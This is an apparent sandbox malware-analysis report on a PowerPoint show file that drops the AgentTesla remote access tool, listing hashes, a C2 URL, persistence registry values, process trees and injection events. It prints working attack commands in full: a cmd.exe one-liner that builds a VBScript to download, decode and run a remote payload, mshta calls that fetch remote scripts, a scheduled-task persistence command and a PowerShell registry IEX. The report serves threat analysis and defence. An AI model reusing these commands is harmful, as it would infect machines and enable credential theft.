Analysis
max time kernel: 118s
max time network: 138s
platform: windows10_x64
resource: win10v20201028
submitted: 05-03-2021 10:09
Static task: static1
Behavioral task: behavioral1 (Sample: 25.pps, Resource: win7v20201028)
Behavioral task: behavioral2 (Sample: 25.pps, Resource: win10v20201028)
General
Target: 25.pps
Size: 100KB
MD5: c30e4c2f1fa54d2ef33b728ab424eeb5
SHA1: 78de8719ed871189a4a79f4d37b6f664dbd7ed29
SHA256: 8db5da6f4ee55565df9d436ab0052eaebab54a915929835e839c513e6c658e9f
SHA512: 03266e5d5f717c7042e45a0703771eb66d72bfd2751309c27ca9162c1924bca360cf9b49522ea93484fa6c9e4a5ac46d32dcec1b65e7e1396aacc6d0528b18e0
Malware Config
Extracted
agenttesla
http://103.133.105.179/3232/inc/62120b2819c6f4.php
Signatures
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: MSHTA.exe, ping.exe, ping.exe
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 4036 | 880 | MSHTA.exe | POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 1232 | 880 | ping.exe | POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 4128 | 880 | ping.exe | POWERPNT.EXE
AgentTesla Payload 2 IoCs
resource | yara_rule
behavioral2/memory/4560-65-0x0000000000400000-0x000000000043C000-memory.dmp | family_agenttesla
behavioral2/memory/4560-66-0x0000000000437DEE-mapping.dmp | family_agenttesla
Blocklisted process makes network request 15 IoCs
Processes: MSHTA.exe, WScript.exe, Powershell.exe
flow | pid | process
32 | 4036 | MSHTA.exe
34 | 4036 | MSHTA.exe
36 | 4036 | MSHTA.exe
38 | 4036 | MSHTA.exe
39 | 4036 | MSHTA.exe
41 | 4036 | MSHTA.exe
43 | 4036 | MSHTA.exe
48 | 4036 | MSHTA.exe
50 | 4036 | MSHTA.exe
52 | 4036 | MSHTA.exe
54 | 4036 | MSHTA.exe
55 | 4036 | MSHTA.exe
57 | 688 | WScript.exe
59 | 688 | WScript.exe
66 | 3160 | Powershell.exe
Drops file in Drivers directory 1 IoCs
Processes: jsc.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | jsc.exe
Adds Run key to start application 2 TTPs 5 IoCs
Processes: MSHTA.exe
description: Key created
ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run
process: MSHTA.exe
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")"
process: MSHTA.exe
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@bublicamukajuka.blogspot.com/p/300.html\"\", 0 : window.close\")"
process: MSHTA.exe
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/300.html\"\", 0 : window.close\")"
process: MSHTA.exe
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/300.html\"\", 0 : window.close\")"
process: MSHTA.exe
Suspicious use of SetThreadContext 1 IoCs
Processes: Powershell.exe
description | pid | process | target process
PID 3160 set thread context of 4560 | 3160 | Powershell.exe | jsc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 1 IoCs
Processes: WerFault.exe
pid | pid_target | process | target process
1392 | 4036 | WerFault.exe | MSHTA.exe
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: POWERPNT.EXE, winword.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | winword.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | winword.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winword.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates system info in registry 2 TTPs 6 IoCs
Processes: winword.exe, POWERPNT.EXE
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | winword.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | winword.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | winword.exe
Modifies registry class 1 IoCs
Processes: cmd.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings | cmd.exe
Runs ping.exe 1 TTPs 2 IoCs
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes: POWERPNT.EXE, winword.exe
pid | process
880 | POWERPNT.EXE
3576 | winword.exe
3576 | winword.exe
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
WerFault.exePowershell.exejsc.exepid process 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 3160 Powershell.exe 3160 Powershell.exe 3160 Powershell.exe 4560 jsc.exe 4560 jsc.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes: WerFault.exe, Powershell.exe, jsc.exe
description | pid | process
Token: SeDebugPrivilege | 1392 | WerFault.exe
Token: SeDebugPrivilege | 3160 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 3160 | Powershell.exe
Token: SeSecurityPrivilege | 3160 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 3160 | Powershell.exe
Token: SeLoadDriverPrivilege | 3160 | Powershell.exe
Token: SeSystemProfilePrivilege | 3160 | Powershell.exe
Token: SeSystemtimePrivilege | 3160 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 3160 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 3160 | Powershell.exe
Token: SeCreatePagefilePrivilege | 3160 | Powershell.exe
Token: SeBackupPrivilege | 3160 | Powershell.exe
Token: SeRestorePrivilege | 3160 | Powershell.exe
Token: SeShutdownPrivilege | 3160 | Powershell.exe
Token: SeDebugPrivilege | 3160 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 3160 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 3160 | Powershell.exe
Token: SeUndockPrivilege | 3160 | Powershell.exe
Token: SeManageVolumePrivilege | 3160 | Powershell.exe
Token: 33 | 3160 | Powershell.exe
Token: 34 | 3160 | Powershell.exe
Token: 35 | 3160 | Powershell.exe
Token: 36 | 3160 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 3160 | Powershell.exe
Token: SeSecurityPrivilege | 3160 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 3160 | Powershell.exe
Token: SeLoadDriverPrivilege | 3160 | Powershell.exe
Token: SeSystemProfilePrivilege | 3160 | Powershell.exe
Token: SeSystemtimePrivilege | 3160 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 3160 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 3160 | Powershell.exe
Token: SeCreatePagefilePrivilege | 3160 | Powershell.exe
Token: SeBackupPrivilege | 3160 | Powershell.exe
Token: SeRestorePrivilege | 3160 | Powershell.exe
Token: SeShutdownPrivilege | 3160 | Powershell.exe
Token: SeDebugPrivilege | 3160 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 3160 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 3160 | Powershell.exe
Token: SeUndockPrivilege | 3160 | Powershell.exe
Token: SeManageVolumePrivilege | 3160 | Powershell.exe
Token: 33 | 3160 | Powershell.exe
Token: 34 | 3160 | Powershell.exe
Token: 35 | 3160 | Powershell.exe
Token: 36 | 3160 | Powershell.exe
Token: SeDebugPrivilege | 4560 | jsc.exe
Suspicious use of SetWindowsHookEx 5 IoCs
Processes: POWERPNT.EXE, winword.exe
pid | process
880 | POWERPNT.EXE
880 | POWERPNT.EXE
3576 | winword.exe
3576 | winword.exe
3576 | winword.exe
Suspicious use of WriteProcessMemory 25 IoCs
Processes: POWERPNT.EXE, MSHTA.exe, cmd.exe, Powershell.exe
description | pid | process | target process
PID 880 wrote to memory of 4036 | 880 | POWERPNT.EXE | MSHTA.exe
PID 880 wrote to memory of 4036 | 880 | POWERPNT.EXE | MSHTA.exe
PID 880 wrote to memory of 1232 | 880 | POWERPNT.EXE | ping.exe
PID 880 wrote to memory of 1232 | 880 | POWERPNT.EXE | ping.exe
PID 880 wrote to memory of 3576 | 880 | POWERPNT.EXE | winword.exe
PID 880 wrote to memory of 3576 | 880 | POWERPNT.EXE | winword.exe
PID 4036 wrote to memory of 3848 | 4036 | MSHTA.exe | cmd.exe
PID 4036 wrote to memory of 3848 | 4036 | MSHTA.exe | cmd.exe
PID 3848 wrote to memory of 688 | 3848 | cmd.exe | WScript.exe
PID 3848 wrote to memory of 688 | 3848 | cmd.exe | WScript.exe
PID 4036 wrote to memory of 3176 | 4036 | MSHTA.exe | schtasks.exe
PID 4036 wrote to memory of 3176 | 4036 | MSHTA.exe | schtasks.exe
PID 4036 wrote to memory of 3160 | 4036 | MSHTA.exe | Powershell.exe
PID 4036 wrote to memory of 3160 | 4036 | MSHTA.exe | Powershell.exe
PID 4036 wrote to memory of 3160 | 4036 | MSHTA.exe | Powershell.exe
PID 880 wrote to memory of 4128 | 880 | POWERPNT.EXE | ping.exe
PID 880 wrote to memory of 4128 | 880 | POWERPNT.EXE | ping.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
PID 3160 wrote to memory of 4560 | 3160 | Powershell.exe | jsc.exe
Processes
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE (depth 1)
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\25.pps" /ou ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
C:\Windows\SYSTEM32\MSHTA.exe (depth 2)
MSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkokwaskdoaskdokkdl
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
C:\Windows\System32\cmd.exe (depth 3)
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
- Modifies registry class
- Suspicious use of WriteProcessMemory
C:\Windows\System32\WScript.exe (depth 4)
"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
- Blocklisted process makes network request
C:\Windows\System32\schtasks.exe (depth 3)
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/300.html""\"", 0 : window.close"\")
- Creates scheduled task(s)
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe (depth 3)
"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (depth 4)
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\WerFault.exe (depth 3)
C:\Windows\system32\WerFault.exe -u -p 4036 -s 2896
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SYSTEM32\ping.exe (depth 2)
ping
- Process spawned unexpected child process
- Runs ping.exe
C:\Program Files\Microsoft Office\Root\Office16\winword.exe (depth 2)
winword
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
C:\Windows\SYSTEM32\ping.exe (depth 2)
ping 127.0.0.1
- Process spawned unexpected child process
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5: 50308e654d10f196ff97f70c8ae32be8
SHA1: 44af0ff1918b729945b6b7052250f13cfe2e154a
SHA256: bb4aa4afd64c31f895454eb788ddab2d6da854e80b59d55822cd7beb6b3d0ccb
SHA512: ba8f253774cb7438361a48f4e671a0417ae450095f062761e6a4bd5f9a422f4276af28ec3ab7135db24843600276fb7fa41284753bc6feda6aeb22ac45ad32a4
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5: c9a852c59c41561e1dbf015f4a36569b
SHA1: 880ca939178abe3937d99ee09fda70ea17b78354
SHA256: b10d818ec975707276d77326e36f2c0d686b37fc726ef5e03ff6e53b0c4c5fbc
SHA512: 2fe322e8c99e9b9bcfca5d7543bfa6f52bc54c4e846abde777fc1a91ae37cc6bec2a860b73158fe3b5aa2b99b6b96dc473760da3114082d48ffeb5d0c8e8b3a7
C:\Users\Public\SiggiaW.vbs
MD5: 49744d1b597f85a2691eeeccab3f5ec9
SHA1: 53be659955bdf552d103ddd2251f97920c4830bd
SHA256: 09af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f
SHA512: 7d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f